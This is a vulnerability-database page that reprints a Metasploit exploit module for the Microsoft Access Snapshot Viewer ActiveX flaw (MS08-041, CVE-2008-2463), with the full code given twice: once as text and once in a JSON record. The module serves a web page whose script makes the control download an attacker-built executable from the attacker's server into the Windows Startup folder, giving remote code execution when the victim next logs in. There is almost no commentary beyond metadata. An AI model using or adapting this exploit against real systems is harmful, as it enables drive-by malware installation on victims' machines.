Search...

Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download

2014-07-01T00:00:00

ID SSV:71119
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ##
# $Id: ms08_041_snapshotviewer.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::EXE

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;           =&#62; &#39;Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download&#39;,
			&#39;Description&#39;    =&#62; %q{
					This module allows remote attackers to place arbitrary files on a users file system
				via the Microsoft Office Snapshot Viewer ActiveX Control.
			},
			&#39;License&#39;        =&#62; MSF_LICENSE,
			&#39;Author&#39;         =&#62; [ &#39;MC&#39; ],
			&#39;Version&#39;        =&#62; &#39;$Revision: 10394 $&#39;,
			&#39;References&#39;     =&#62;
				[
					[ &#39;CVE&#39;, &#39;2008-2463&#39; ],
					[ &#39;OSVDB&#39;, &#39;46749&#39;],
					[ &#39;MSB&#39;, &#39;MS08-041&#39; ],
					[ &#39;BID&#39;, &#39;30114&#39; ],
				],
			&#39;Payload&#39;        =&#62;
				{
					&#39;Space&#39;           =&#62; 2048,
					&#39;StackAdjustment&#39; =&#62; -3500,
				},
			&#39;Platform&#39;       =&#62; &#39;win&#39;,
			&#39;Targets&#39;        =&#62;
				[
					[ &#39;Automatic&#39;, { } ],
				],
			&#39;DefaultTarget&#39;  =&#62; 0,
			&#39;DisclosureDate&#39; =&#62; &#39;Jul 07 2008&#39;))

		register_options(
			[
				OptString.new(&#39;PATH&#39;, [ true, &#39;The path to place the executable.&#39;, &#39;C:\\\\Documents and Settings\\\\All Users\\\\Start Menu\\\\Programs\\\\Startup\\\\&#39;]),
			], self.class)
	end

	def autofilter
		false
	end

	def check_dependencies
		use_zlib
	end

	def on_request_uri(cli, request)

		payload_url =  &#34;http://&#34;
		payload_url += (datastore[&#39;SRVHOST&#39;] == &#39;0.0.0.0&#39;) ? Rex::Socket.source_address(cli.peerhost) : datastore[&#39;SRVHOST&#39;]
		payload_url += &#34;:&#34; + datastore[&#39;SRVPORT&#39;] + get_resource() + &#34;/payload&#34;

		if (request.uri.match(/payload/))
			return if ((p = regenerate_payload(cli)) == nil)
			data = generate_payload_exe({ :code =&#62; p.encoded })
			print_status(&#34;Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...&#34;)
			send_response(cli, data, { &#39;Content-Type&#39; =&#62; &#39;application/octet-stream&#39; })
			return
		end

		vname  = rand_text_alpha(rand(100) + 1)
		exe    = rand_text_alpha(rand(20) + 1)

		content = %Q|
		&#60;html&#62;
		&#60;head&#62;
			&#60;script&#62;
			try {
				var #{vname} = new ActiveXObject(&#39;snpvw.Snapshot Viewer Control.1&#39;);
				#{vname}.SnapshotPath = &#34;#{payload_url}&#34;;
				#{vname}.CompressedPath = &#34;#{datastore[&#39;PATH&#39;]}\\#{exe}.exe&#34;;
				#{vname}.PrintSnapshot();
			} catch( e ) { window.location = &#39;about:blank&#39; ; }
			&#60;/script&#62;
		&#60;/head&#62;
		&#60;/html&#62;
				|

		print_status(&#34;Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...&#34;)

		send_response_html(cli, content)

		handler(cli)

	end

end

JSON Vulners Source

Initial Source

{"href": "https://www.seebug.org/vuldb/ssvid-71119", "status": "cve,poc,details", "history": [], "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-71119", "cvelist": [], "description": "No description provided by source.", "viewCount": 1, "published": "2014-07-01T00:00:00", "sourceData": "\n ##\r\n# $Id: ms08_041_snapshotviewer.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\tinclude Msf::Exploit::EXE\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module allows remote attackers to place arbitrary files on a users file system\r\n\t\t\t\tvia the Microsoft Office Snapshot Viewer ActiveX Control.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2008-2463' ],\r\n\t\t\t\t\t[ 'OSVDB', '46749'],\r\n\t\t\t\t\t[ 'MSB', 'MS08-041' ],\r\n\t\t\t\t\t[ 'BID', '30114' ],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2048,\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jul 07 2008'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('PATH', [ true, 'The path to place the executable.', 'C:\\\\\\\\Documents and Settings\\\\\\\\All Users\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\Startup\\\\\\\\']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tpayload_url = "http://"\r\n\t\tpayload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']\r\n\t\tpayload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"\r\n\r\n\t\tif (request.uri.match(/payload/))\r\n\t\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\t\t\tdata = generate_payload_exe({ :code => p.encoded })\r\n\t\t\tprint_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")\r\n\t\t\tsend_response(cli, data, { 'Content-Type' => 'application/octet-stream' })\r\n\t\t\treturn\r\n\t\tend\r\n\r\n\t\tvname = rand_text_alpha(rand(100) + 1)\r\n\t\texe = rand_text_alpha(rand(20) + 1)\r\n\r\n\t\tcontent = %Q|\r\n\t\t<html>\r\n\t\t<head>\r\n\t\t\t<script>\r\n\t\t\ttry {\r\n\t\t\t\tvar #{vname} = new ActiveXObject('snpvw.Snapshot Viewer Control.1');\r\n\t\t\t\t#{vname}.SnapshotPath = "#{payload_url}";\r\n\t\t\t\t#{vname}.CompressedPath = "#{datastore['PATH']}\\\\#{exe}.exe";\r\n\t\t\t\t#{vname}.PrintSnapshot();\r\n\t\t\t} catch( e ) { window.location = 'about:blank' ; }\r\n\t\t\t</script>\r\n\t\t</head>\r\n\t\t</html>\r\n\t\t\t\t|\r\n\r\n\t\tprint_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")\r\n\r\n\t\tsend_response_html(cli, content)\r\n\r\n\t\thandler(cli)\r\n\r\n\tend\r\n\r\nend\r\n\n ", "id": "SSV:71119", "enchantments_done": [], "_object_type": "robots.models.seebug.SeebugBulletin", "type": "seebug", "lastseen": "2017-11-19T16:41:23", "reporter": "Root", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2017-11-19T16:41:23"}, "dependencies": {"references": [], "modified": "2017-11-19T16:41:23"}, "vulnersScore": -0.2}, "objectVersion": "1.4", "references": []}